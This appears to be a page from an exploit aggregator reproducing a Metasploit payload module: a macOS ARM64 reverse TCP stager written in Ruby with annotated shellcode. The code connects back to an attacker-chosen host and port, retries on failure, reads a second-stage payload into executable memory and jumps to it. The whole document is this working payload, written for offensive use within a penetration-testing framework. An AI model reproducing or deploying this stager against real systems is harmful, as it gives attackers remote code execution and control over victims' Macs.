Share
## https://sploitus.com/exploit?id=MSF:PAYLOAD-OSX-AARCH64-METERPRETER-REVERSE_TCP-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# ReverseTcp
# ----------
#
# Osx reverse TCP stager.
#
###
module MetasploitModule
CachedSize = 328
include Msf::Payload::Stager
def initialize(info = {})
super(
merge_info(
info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => 'usiegl00',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_AARCH64,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' => { 'RequiresMidstager' => false },
'Convention' => 'sockedi'
)
)
end
def generate(_opts = {})
encoded_port = [datastore['LPORT'].to_i, 2].pack('vv').unpack('N').first
encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
retry_count = datastore['StagerRetryCount']
seconds = datastore['StagerRetryWait']
sleep_seconds = seconds.to_i
sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
payload = [
# Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s
# <_main>:
0xaa1f03e0, # mov x0, xzr
0xd2802901, # mov x1, #328
0xd2800042, # mov x2, #2
0xd2820043, # mov x3, #4098
0xaa3f03e4, # mvn x4, xzr
0xaa1f03e5, # mov x5, xzr
0x580007d0, # ldr x16, 0x100003f80 <sleep_seconds+0x8>
0xd4000001, # svc #0
0xb100041f, # cmn x0, #1
0x54000600, # b.eq 0x100003f54 <failed>
0xaa0003ec, # mov x12, x0
0xd280000a, # mov x10, #0
0x1000064b, # adr x11, #200
0xf940016b, # ldr x11, [x11]
# <socket>:
0xd2800040, # mov x0, #2
0xd2800021, # mov x1, #1
0xd2800002, # mov x2, #0
0x580006b0, # ldr x16, 0x100003f88 <sleep_seconds+0x10>
0xd4000001, # svc #0
0xaa0003ed, # mov x13, x0
0x10000501, # adr x1, #160
0xf9400021, # ldr x1, [x1]
0xf81f8fe1, # str x1, [sp, #-8]!
0x910003e1, # mov x1, sp
0xd2800202, # mov x2, #16
0x580005f0, # ldr x16, 0x100003f90 <sleep_seconds+0x18>
0xd4000001, # svc #0
0xaa0d03e0, # mov x0, x13
0xaa0c03e1, # mov x1, x12
0xd2802902, # mov x2, #328
0xd2800803, # mov x3, #64
0xaa1f03e4, # mov x4, xzr
0xaa1f03e5, # mov x5, xzr
0x58000530, # ldr x16, 0x100003f98 <sleep_seconds+0x20>
0xd4000001, # svc #0
0xaa0c03e0, # mov x0, x12
0xd2802901, # mov x1, #328
0xd28000a2, # mov x2, #5
0x580004d0, # ldr x16, 0x100003fa0 <sleep_seconds+0x28>
0xd4000001, # svc #0
0xd61f0180, # br x12
# <retry>:
0xd100056b, # sub x11, x11, #1
0xf100017f, # cmp x11, #0
0x540001c0, # b.eq 0x100003f54 <failed>
0xd2800000, # mov x0, #0
0xd2800001, # mov x1, #0
0x10000242, # adr x2, #72
0xf9400042, # ldr x2, [x2]
0x10000243, # adr x3, #72
0xf9400063, # ldr x3, [x3]
0xa9bf0be3, # stp x3, x2, [sp, #-16]!
0x910003e4, # mov x4, sp
0xd2800002, # mov x2, #0
0xd2800003, # mov x3, #0
0x58000310, # ldr x16, 0x100003fa8 <sleep_seconds+0x30>
0xd4000001, # svc #0
0x54ffface, # b.al 0x100003ea8 <socket>
# <failed>:
0xd2800020, # mov x0, #1
0x580002d0, # ldr x16, 0x100003fb0 <sleep_seconds+0x38>
0xd4000001, # svc #0
# <caddr>:
encoded_port, # ldr d2, 0x100025f60 <SYS_MMAP+0xfe025e9b>
encoded_host, # <unknown>
# <retry_count>:
retry_count, # udf #16962
0x00000000, # udf #16962
# <sleep_nanoseconds>:
0x00000000, # udf #17219
sleep_nanoseconds, # udf #17219
# <sleep_seconds>:
0x00000000, # udf #17476
sleep_seconds, # udf #17476
0x020000c5, # <unknown>
0x00000000, # udf #0
0x02000061, # <unknown>
0x00000000, # udf #0
0x02000062, # <unknown>
0x00000000, # udf #0
0x0200001d, # <unknown>
0x00000000, # udf #0
0x0200004a, # <unknown>
0x00000000, # udf #0
0x0200005d, # <unknown>
0x00000000, # udf #0
0x02000001, # <unknown>
0x00000000, # udf #0
].pack('V*')
return payload
end
end